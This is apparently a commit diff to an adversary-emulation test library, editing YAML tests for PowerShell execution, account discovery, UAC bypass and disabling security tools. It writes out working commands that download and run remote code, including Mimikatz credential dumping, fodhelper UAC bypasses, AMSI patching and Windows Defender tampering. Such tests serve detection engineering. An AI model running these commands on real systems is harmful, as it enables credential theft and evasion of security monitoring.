T1086 T1087 T1088 T1089 Updates (#944)

* 1087 Updates

* add 1086 Updates

* add T1088 updates

* update T1089

* typo fix

* typo fix

* typo fix

* fix input args

* remove uninstall sysmon changes

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1086/T1086.yaml

@@ -19,11 +19,11 @@ atomic_tests:
     command: |
       powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
 
-- name: Run BloodHound from local disk 
+- name: Run BloodHound from local disk
   description: |
     Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
 
-    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
+    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
   supported_platforms:
     - windows
   input_arguments:
@@ -39,7 +39,7 @@ atomic_tests:
       description: Output path for BloodHound reports
       type: String
       default: PathToAtomicsFolder\T1086\src
-  
+
   dependency_executor_name: powershell
   dependencies:
     - description: |
@@ -55,7 +55,7 @@ atomic_tests:
     command: |
       write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
       import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
-       
+
     cleanup_command: |
       Remove-Item #{file_path}\SharpHound.ps1 -Force
       Remove-Item #{file_path}\*BloodHound.zip -Force
@@ -64,7 +64,7 @@ atomic_tests:
   description: |
     Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
 
-    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
+    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
   supported_platforms:
     - windows
   input_arguments:
@@ -78,14 +78,13 @@ atomic_tests:
     command: |
       write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
       powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
-       
+
     cleanup_command: |
       Remove-Item #{output_path}\*BloodHound.zip -Force
 
 - name: Obfuscation Tests
   description: |
-    Different obfuscated methods to test
-    Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
+    Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
   supported_platforms:
     - windows
   executor:
@@ -109,9 +108,9 @@ atomic_tests:
 
 - name: Invoke-AppPathBypass
   description: |
-    Note: Windows 10 only
+    Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
+
     Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
-    Upon execution windows backup and restore window will be opened
   supported_platforms:
     - windows
   executor:
@@ -120,24 +119,6 @@ atomic_tests:
     command: |
       Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
 
-- name: Powershell MsXml COM object - no prompt
-  description: |
-    Provided by https://github.com/mgreen27/mgreen27.github.io
-    Powershell MsXml COM object.
-    Not proxy aware removing cache although does not appear to write to those locations
-  supported_platforms:
-    - windows
-  input_arguments:
-    url:
-      description: url of payload to execute
-      type: url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
-  executor:
-    name: command_prompt
-    elevation_required: false
-    command: |
-      powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
-
 - name: Powershell MsXml COM object - with prompt
   description: |
     Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
@@ -223,6 +204,8 @@ atomic_tests:
 
 - name: PowerShell Downgrade Attack
   description: |
+    This test requires the manual installation of PowerShell V2.
+
     Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
   supported_platforms:
     - windows

atomics/T1087/T1087.yaml

@@ -124,7 +124,7 @@ atomic_tests:
 
 - name: Enumerate all accounts via PowerShell
   description: |
-    Enumerate all accounts via PowerShell
+    Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
   supported_platforms:
     - windows
   executor:
@@ -143,9 +143,9 @@ atomic_tests:
       get-localgroup
       net localgroup
 
-- name: Enumerate logged on users
+- name: Enumerate logged on users via CMD
   description: |
-    Enumerate logged on users
+    Enumerate logged on users. Upon exeuction, logged on users will be displayed.
   supported_platforms:
     - windows
   executor:
@@ -156,7 +156,7 @@ atomic_tests:
 
 - name: Enumerate logged on users via PowerShell
   description: |
-    Enumerate logged on users via PowerShell
+    Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed.
   supported_platforms:
     - windows
   executor:

atomics/T1088/T1088.yaml

@@ -47,7 +47,7 @@ atomic_tests:
 - name: Bypass UAC using Fodhelper
   description: |
     Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
-
+    Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
   supported_platforms:
     - windows
 
@@ -62,7 +62,7 @@ atomic_tests:
     elevation_required: false
     command: |
       reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
-      reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
+      reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
       fodhelper.exe
     cleanup_command: |
       reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
@@ -70,7 +70,7 @@ atomic_tests:
 - name: Bypass UAC using Fodhelper - PowerShell
   description: |
     PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
-
+    Upon execution command prompt will be opened.
   supported_platforms:
     - windows
 

atomics/T1089/T1089.yaml

@@ -210,6 +210,8 @@ atomic_tests:
 - name: AMSI Bypass - AMSI InitFailed
   description: |
     Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+    Upon execution, no output is displayed.
+
     https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
   supported_platforms:
     - windows
@@ -219,12 +221,13 @@ atomic_tests:
     command: |
       [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
     cleanup_command: |
-      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore
+      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
 
 - name: AMSI Bypass - Remove AMSI Provider Reg Key
   description: |
     With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
-    This test removes the Windows Defender provider registry key.
+    This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
+    Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
   supported_platforms:
     - windows
   executor:
@@ -232,12 +235,14 @@ atomic_tests:
     elevation_required: true
     command: |
        Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
-    cleanup_command: | 
+    cleanup_command: |
        New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
 
 - name: Disable Arbitrary Security Windows Service
   description: |
-    With administrative rights, an adversary can disable Windows Services related to security products.
+    With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
+    Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
+    To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
   supported_platforms:
     - windows
   input_arguments:
@@ -255,40 +260,6 @@ atomic_tests:
        sc.exe config #{service_name} start= auto >nul 2>&1
        net.exe start #{service_name} >nul 2>&1
 
-- name: Disable PowerShell Script Block Logging
-  description: |
-    An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
-
-    Credit to Matt Graeber (@mattifestation) for the research.
-  supported_platforms:
-    - windows
-  executor:
-    name: powershell
-    elevation_required: false
-    command: |
-      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
-      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
-      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
-      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
-    cleanup_command: |
-      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
-      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
-      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
-      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
-
-- name: PowerShell Bypass of AntiMalware Scripting Interface
-  description: |
-    An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
-
-    Credit to Matt Graeber (@mattifestation) for the research.
-  supported_platforms:
-    - windows
-  executor:
-    name: powershell
-    elevation_required: false
-    command: |
-      [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
-
 - name: Tamper with Windows Defender ATP PowerShell
   description: |
     Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
@@ -312,7 +283,8 @@ atomic_tests:
 - name: Tamper with Windows Defender Command Prompt
   description: |
     Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
-    However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
+    However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
+    will be displayed twice and the WinDefend service status will be displayed.
   supported_platforms:
     - windows
   executor:
@@ -343,7 +315,7 @@ atomic_tests:
 - name: Disable Microft Office Security Features
   description: |
     Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
-    show any warning before editing the document
+    show any warning before editing the document.
 
 
     https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/